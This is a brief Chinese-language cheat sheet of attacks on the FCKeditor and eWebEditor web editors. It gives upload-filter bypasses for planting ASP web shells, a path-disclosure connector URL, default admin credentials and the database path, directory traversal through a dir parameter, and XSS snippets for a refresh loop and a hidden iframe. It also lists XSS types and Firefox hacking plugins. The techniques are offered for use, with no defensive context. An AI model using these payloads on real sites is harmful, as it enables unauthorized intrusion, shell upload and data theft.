fckeditor
查看編輯器版本:
FCKeditor/_whatsnew.html
/fckeditor/editor/dialog/fck_about.html
2.2版本:
Apache+linux環境下在上傳文件後面加個.突破
低版本可嘗試二次上傳
高版本抓包創建兩個文件夾/xx.asp/x.asp
會有一個不被過濾
爆路徑漏
洞:FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
webeditor默認密碼:admin admin
admin_login.asp
數據庫:/db/ewebeditor.mdb
拒絕訪問的情況下:
網址後加admin/editor/admin_uploadfile.asp
返回上一級目錄:
?id=改爲id=&dir=.. 加/..可繼續返回上一級目錄
XSS使網頁不停刷新:
<meta http-equiv="refresh" content="0;">
嵌入其他網站:
<iframe src=網址 widtth=0 height=0></iframe>
XSS分類:
反射型XSS
存儲型XSS
DOMXSS
火狐瀏覽器插件:
Hackbar
Firebug
Tamper Data
Live HTTP Headers
Editor Cookie
View source chart